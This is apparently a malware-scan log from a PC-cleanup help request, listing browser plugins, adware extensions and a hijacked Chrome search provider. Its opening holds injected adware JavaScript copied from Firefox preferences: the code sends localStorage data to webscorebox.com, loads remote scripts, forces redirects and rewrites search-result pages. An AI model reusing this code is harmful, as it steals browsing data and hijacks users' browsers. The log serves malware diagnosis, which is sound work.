h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd96rjnMCyVUojaMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rHrFrTg4rHk4qdk7rjg5qTr7ra==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://yt.jobfindgol...\" Math.random();break}}}catch(d){}})();if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=pcom&userId=7551013890&CTID=p0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1499/l.js?aoi=1311798366&pid=1499&zoneid=287609&ext=safesaver\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.dataf...fklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.4\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\", function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0;if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\"); if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"], urls:[\"http://www.bing.com/...idate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.condui...:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/w...rc_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"], validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple...idate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\", \"http://search.incred...idate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.c...tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop= \"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a, null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.co...date:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"], src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache= [];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c,b,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"== typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b,d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0); this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var k=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++; k(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a, B){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function( B){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]? b.currentStyle[d]:null}}}:function(a, B){return window.getComputedStyle(a, B)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch( B){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild( B);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\"; window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a= a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a, B){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)}, B)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test( B))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"== d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"== f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref= function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a= a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template); d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h))return h;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function( B){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a, c[0])),b.not_unique_items.push(c.shift())};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a, B){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector); \"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout=b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items= [];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search(); for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value; if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]); else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael= B);d=b.jsonpHost+\"/?v=\"+b.version+ \"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=3312693594561686360&eid=714&pid=0\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});})();(function(){void(0)})()");
FF - prefs.js..network.proxy.type: 0
FF - prefs.js..sweetim.toolbar.previous.browser.search.defaultenginename: ""
FF - prefs.js..sweetim.toolbar.previous.browser.search.selectedEngine: ""
FF - prefs.js..browser.startup.homepage: ""
FF - prefs.js..sweetim.toolbar.previous.keyword.URL: ""
 
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.6.2: C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.6.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@perfectworld.com/npArcPlayNowPlugin: C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\npArcPluginFF.dll (Perfect World Entertainment Inc)
FF - HKLM\Software\MozillaPlugins\@playstation.com/PsndlCheck,version=1.00: C:\Program Files (x86)\Sony\PLAYSTATION Network Downloader\nppsndl.dll (Sony Computer Entertainment Inc.)
FF - HKLM\Software\MozillaPlugins\@SonyCreativeSoftware.com/Media Go,version=1.0: C:\Program Files (x86)\Sony\Media Go\npmediago.dll (Sony Network Entertainment International LLC)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKCU\Software\MozillaPlugins\vitzo.com/VDownloader: C:\Program Files\VDownloader\Addons\npVDownloader.dll (Vitzo)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\support@vdownloader.com: C:\Program Files\VDownloader\Addons\FireFox [2012/11/07 10:42:15 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/12/11 08:19:51 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013/12/11 08:19:52 | 000,000,000 | ---D | M]
 
[2012/10/12 01:09:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Extensions
[2014/01/02 08:59:38 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions
[2013/12/31 23:48:33 | 000,000,000 | ---D | M] (FuanDEals) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\gagd2ahqc@aeayrtlv.co.uk
[2013/12/31 23:48:40 | 000,000,000 | ---D | M] (DeAlEoxipRRESs) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\hcaviui4igd@iqzhydu.edu
[2014/01/02 08:59:38 | 000,535,529 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
[2014/01/02 08:55:53 | 000,915,554 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2013/04/20 10:47:18 | 000,001,001 | ---- | M] () -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\searchplugins\conduit.xml
[2013/04/03 08:03:03 | 000,001,378 | ---- | M] () -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\searchplugins\privitize.xml
[2012/08/20 06:34:15 | 000,002,519 | ---- | M] () -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\searchplugins\Search_Results.xml
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}
[2013/12/11 08:19:50 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/12/11 08:19:54 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2011/12/10 11:24:00 | 000,002,288 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\babylon.xml
[2011/05/11 06:46:31 | 000,002,252 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml.old
[2012/08/20 06:34:15 | 000,002,519 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\Search_Results.xml
 
========== Chrome  ==========
 
CHR - homepage:
CHR - default_search_provider: Search The Web (privitize) ()
CHR - default_search_provider: search_url = http://searchou.com/...0000050b60df2d6
CHR - default_search_provider: suggest_url =
CHR - homepage: http://searchou.com/...0000050b60df2d6
CHR - plugin: Silverlight 3 (Enabled) = default_plugin
CHR - plugin: Error reading preferences file
